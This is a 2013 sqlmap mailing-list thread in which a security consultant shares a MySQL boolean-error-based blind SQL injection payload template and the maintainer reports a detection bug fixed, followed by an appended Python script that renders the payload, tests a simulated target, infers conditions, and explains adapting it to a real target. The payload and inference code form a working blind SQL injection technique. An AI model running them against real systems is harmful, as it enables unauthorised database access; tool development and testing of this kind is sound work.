Re: [sqlmap-users] Non-Detected SQLi
From: Miroslav S. <mir...@gm...> - 2013-06-10 10:23:06
Hi Sebastian.

There was indeed a bug [1]. Find it fixed now.

If you would like to contribute this payload we could include it into sqlmap :)

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/462

On Mon, Jun 10, 2013 at 11:30 AM, Sebastian Nerz <seb...@sy...> wrote:
> Hi there,
>
> I wrote a small payload to test for conditional error-based
> SQL-injection possibilities:
>
> <!-- Boolean-error-based blind tests - WHERE/HAVING clause -->
> <test>
>     <title>AND boolean-error-based blind - WHERE or HAVING clause (MySQL)</title>
>     <stype>1</stype>
>     <level>1</level>
>     <risk>1</risk>
>     <clause>1</clause>
>     <where>1</where>
>     <vector>REGEXP IF([INFERENCE],1,"")</vector>
>     <request>
>         <payload>REGEXP IF([RANDNUM]=[RANDNUM],1,"")</payload>
>     </request>
>     <response>
>         <comparison>REGEXP IF([RANDNUM]=[RANDNUM1],1,"")</comparison>
>     </response>
>     <details>
>         <dbms>MySQL</dbms>
>     </details>
> </test>
>
> Theoretically it is working - as long as the server is actually
> returning content, the injection is detected and works just fine (feel
> free to add it to the sqlmap repository, if it is correct :) ). But as
> soon as the tested URL is returning an empty page, detection fails.
>
> * With a TRUE request, the server returns a content-length of 0
> * With a FALSE request, the server returns the error message
>
> Now ... for my understanding, this is quite a difference, but SQLMAP
> fails to recognize it, even with "not-string" given. The problem might
> be that the server returns a warning during the dynamic-check as well.
> Is it possible to forbid the usage of ' during this test?
>
> What am I doing wrong? Is there an error in the payload above? Can
> sqlmap handle empty pages?
>
> Thanks!
>
> Kind regards,
>
> Sebastian Nerz
> --
> Sebastian Nerz
> Dipl.-Inform.
> IT-Security Consultant
>
> mailto:seb...@sy...
> ___________________________________________________________
>
> SySS GmbH
> Wohlboldstraße 8
> 72072 Tübingen
> Germany
> Voice: +49 7071 407856-31
> Fax: +49 7071 407856-19
> WWW: http://www.syss.de
>
> PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2
>
> Geschaeftsfuehrer Sebastian Schreiber
> Registergericht: Amtsgericht Stuttgart / HRB 382420
> Steuernummer: 86118 / 55809
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm
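The payload template quoted above and the empty-page case it tripped over, as an added example that is not part of the thread and not sqlmap's own code. It renders the `[RANDNUM]` / `[RANDNUM1]` / `[INFERENCE]` placeholders the way the template expects, runs them against a constructed target (`fake_target`, no real MySQL involved) that behaves as Sebastian describes, i.e. a TRUE condition yields an empty page and a FALSE one echoes MySQL's error for an empty regular expression, and then decides injectability and evaluates conditions from those responses. The function names `render`, `references`, `is_injectable` and `infer` are this example's own. The modelled behaviour (`REGEXP ""` raising "empty (sub)expression") is that of MySQL 5.x with its Henry Spencer regex engine; MySQL 8.0 moved to ICU regular expressions and treats an empty pattern differently, so the trick has to be re-verified against the target's version.

```python
"""Added example (not sqlmap code): render a sqlmap-style boolean-error-based
payload template, run it against a constructed target that mirrors the
behaviour reported in the thread (TRUE -> empty page, FALSE -> MySQL error
text), and decide injectability / infer conditions from the responses."""
import random
import re

# Placeholders taken from the <test> block in the thread ([INFERENCE],
# [RANDNUM], [RANDNUM1]); the substitution logic itself is this example's own.
VECTOR = 'REGEXP IF([INFERENCE],1,"")'
PAYLOAD_TRUE = 'REGEXP IF([RANDNUM]=[RANDNUM],1,"")'
PAYLOAD_FALSE = 'REGEXP IF([RANDNUM]=[RANDNUM1],1,"")'

# Error text MySQL 5.x (Henry Spencer regex engine) emits for REGEXP "".
MYSQL_EMPTY_REGEXP_ERROR = "Got error 'empty (sub)expression' from regexp"


def render(template, randnum, randnum1=None, inference=None):
    """Expand the placeholders the way the template expects: every [RANDNUM]
    becomes the same number (so [RANDNUM]=[RANDNUM] is a tautology), [RANDNUM1]
    a different one, [INFERENCE] the condition under test."""
    out = template.replace("[RANDNUM1]", str(randnum1)).replace("[RANDNUM]", str(randnum))
    if inference is not None:
        out = out.replace("[INFERENCE]", inference)
    return out


def fake_target(payload):
    """Constructed stand-in for the vulnerable page (no real MySQL involved).
    It evaluates the IF() condition for simple integer comparisons and mimics
    MySQL 5.x: REGEXP "1" is a valid pattern (query succeeds, page is empty),
    REGEXP "" raises an error that the page echoes back."""
    m = re.search(r'IF\((\d+)(=|>|<)(\d+),1,""\)', payload)
    if not m:
        return "<html>item not found</html>"  # nothing injected, normal page
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    cond = {"=": a == b, ">": a > b, "<": a < b}[op]
    if cond:
        return ""  # Content-Length: 0, exactly the TRUE case from the thread
    return "<html>Database error: %s</html>" % MYSQL_EMPTY_REGEXP_ERROR


def references(send):
    """Fetch the TRUE and FALSE reference responses with fresh random numbers."""
    r = random.randint(1000, 9999)
    ref_true = send(render(PAYLOAD_TRUE, r))
    ref_false = send(render(PAYLOAD_FALSE, r, r + 1))
    return ref_true, ref_false


def is_injectable(send):
    """Injectable iff the TRUE response is stable across two requests and
    differs from the FALSE one. The two injected responses are compared with
    each other, never with the unmodified page, so an empty TRUE page is a
    perfectly good reference."""
    true_a, false_a = references(send)
    true_b, _ = references(send)
    return true_a == true_b and true_a != false_a


def infer(send, condition, not_string=None):
    """Evaluate one [INFERENCE] condition. With not_string (the --not-string
    idea from the thread) the decision is 'error text absent => TRUE'; without
    it the response is matched against the references. Exact equality is used
    here for clarity; a real tool compares with a similarity ratio because
    pages carry dynamic content."""
    got = send(render(VECTOR, random.randint(1000, 9999), inference=condition))
    if not_string is not None:
        return not_string not in got
    ref_true, ref_false = references(send)
    if got == ref_true:
        return True
    if got == ref_false:
        return False
    raise ValueError("response matched neither reference; page may be dynamic")


if __name__ == "__main__":
    print("injectable:", is_injectable(fake_target))
    print("5>3 ->", infer(fake_target, "5>3"))
    print("2=3 ->", infer(fake_target, "2=3", not_string="Database error"))
```

To point this at a real target, replace `fake_target` with a function that sends the rendered payload in the injectable parameter and returns the response body; the comparison logic does not need to change, but the exact-equality checks in `infer` should become a similarity threshold once the page contains anything dynamic.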